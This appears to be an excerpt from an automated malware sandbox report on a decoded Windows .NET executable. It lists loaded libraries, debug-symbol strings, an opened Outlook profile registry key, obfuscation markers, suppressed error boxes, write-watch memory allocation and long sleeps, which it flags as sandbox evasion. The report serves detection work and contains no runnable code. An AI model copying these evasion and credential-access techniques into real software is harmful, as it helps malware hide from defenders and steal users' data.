Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006248000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbP source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdbh source: WER1929.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Security.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.pdbMZ source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Web.Extensions.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.000000000625D000.00000004.00000020.00020000.00000000.sdmp, WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.00000000061DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb\t source: WER1929.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbSystem.ni.dllp source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER1929.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC9C30 push esp; retf 00F3h 0_2_00EC9D55
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_067025C0 pushad ; iretd 0_2_06702701
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06708387 push es; iretd 0_2_067083AC
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_067079A3 push es; iretd 0_2_067079A4
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: EC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: 2A80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: 4A80000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Thread delayed: delay time: 599323 Jump to behavior
